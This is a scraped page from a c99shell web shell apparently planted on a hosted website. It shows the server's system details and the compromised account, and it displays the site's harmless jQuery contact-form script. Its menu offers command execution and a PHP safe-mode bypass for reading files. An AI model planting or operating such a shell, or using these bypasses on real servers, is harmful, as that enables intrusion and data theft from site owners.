Software: Apache. PHP/5.4.45 uname -a: Linux webm052.cluster007.gra.hosting.ovh.net 5.15.74-ovh-vps-grsec-zfs-classid #1 SMP Wed uid=763961(ebenisteaz) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/ebenisteaz/www/js/ drwx---r-x |
Viewing file: scripts.js (1.34 KB) -rw----r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | $("#submit").click(function () { $("#contact-form").validate({ errorPlacement: function (error, element) { } }); if ($("#contact-form").valid()) { var options = { dataType: 'json', success: function (data) { if (data.msgStatus === "ok") { alert(data.message); $('#contact-form').clearForm(); } else { alert(data.message); } } } $('#contact-form').ajaxForm(options); } }); //returning to normal style on change $("input, textarea").change(function () { if ($(this).hasClass("error")) { $(this).removeClass("error"); } }); $("select").change(function () { if ($(this).parent().hasClass("error")) { $(this).parent().removeClass("error"); } }); $(document).ready(function () { $("#jMenu").jMenu({ openClick: false, ulWidth: 'auto', TimeBeforeOpening: 100, TimeBeforeClosing: 11, animatedText: false, paddingLeft: 1, effects: { effectSpeedOpen: 150, effectSpeedClose: 150, effectTypeOpen: 'slide', effectTypeClose: 'slide', effectOpen: 'swing', effectClose: 'swing' } }); }); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c99shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | Generation time: 0.0128 ]-- |